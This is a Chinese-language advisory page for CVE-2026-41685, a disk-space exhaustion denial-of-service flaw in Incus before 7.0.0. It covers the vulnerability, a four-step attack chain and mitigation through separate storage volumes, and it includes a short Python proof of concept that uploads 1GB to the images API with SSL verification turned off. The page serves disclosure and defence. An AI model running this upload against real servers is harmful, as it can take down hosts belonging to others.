CVE-2026-41685 CVSS 4.3 中危

CVE-2026-41685 Incus磁盘空间耗尽漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41685

漏洞类型

资源耗尽

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Incus

漏洞概述

Incus是系统容器和虚拟机管理器。在7.0.0版本之前，经过身份认证的用户上传大量数据可能导致Incus服务器耗尽磁盘空间，从而导致主机系统停机。对于使用特定存储卷的用户影响有限，但该漏洞仍构成拒绝服务风险。该问题已在7.0.0版本中修复。

技术细节

此漏洞属于资源耗尽类型的拒绝服务漏洞。在Incus 7.0.0之前的版本中，系统在处理经身份认证用户上传的数据时，缺乏有效的磁盘空间配额限制或检查机制。攻击者利用低权限账户，可以通过网络向服务器发送并上传大量数据。如果未配置使用storage.images_volume和storage.backups_volume，这些数据将直接存储在主机文件系统上。随着数据量不断累积，主机磁盘空间会被耗尽，导致系统无法写入日志或运行关键操作，最终引发主机系统崩溃或服务不可用。该漏洞利用了文件系统资源管理的疏漏，无需用户交互即可实施攻击。

攻击链分析

STEP 1

侦察与发现

攻击者识别目标为运行7.0.0版本之前的Incus服务器，并确认其未配置独立的存储卷限制。

STEP 2

获取访问权限

攻击者利用合法的低权限账户凭证（PR:L）连接到Incus服务器API。

STEP 3

执行攻击

攻击者通过API接口向服务器上传大量数据。由于缺乏配额限制，数据被写入主机文件系统。

STEP 4

达成影响

随着上传数据量增加，主机磁盘空间被填满，导致主机系统及容器服务因资源耗尽而拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit code for demonstration purposes only
# Target: Incus server < 7.0.0
# Description: Uploads a large amount of data to exhaust disk space

def exploit_incus_dos(target_url, cert_path, key_path):
    # Create a large dummy file (e.g., 1GB)
    large_file_size = 1024 * 1024 * 1024  # 1GB
    data = b'X' * large_file_size
    
    # Endpoint for image creation/upload (example)
    upload_url = f"{target_url}/1.0/images"
    
    headers = {
        "Content-Type": "application/octet-stream"
    }
    
    try:
        # Authenticate using client certificate
        response = requests.post(
            upload_url, 
            data=data, 
            cert=(cert_path, key_path), 
            headers=headers, 
            verify=False # Ignore SSL verification for testing
        )
        
        if response.status_code == 202:
            print("[+] Upload initiated. Disk space exhaustion in progress.")
        else:
            print(f"[-] Failed to upload. Status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual Incus server details
    TARGET = "https://192.168.1.100:8443"
    CERT = "/path/to/client.crt"
    KEY = "/path/to/client.key"
    exploit_incus_dos(TARGET, CERT, KEY)

影响范围

Incus < 7.0.0

防御指南

临时缓解措施

建议用户配置使用storage.images_volume和storage.backups_volume，确保大文件上传时存储在独立卷而非主机文件系统上，从而降低主机磁盘耗尽的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表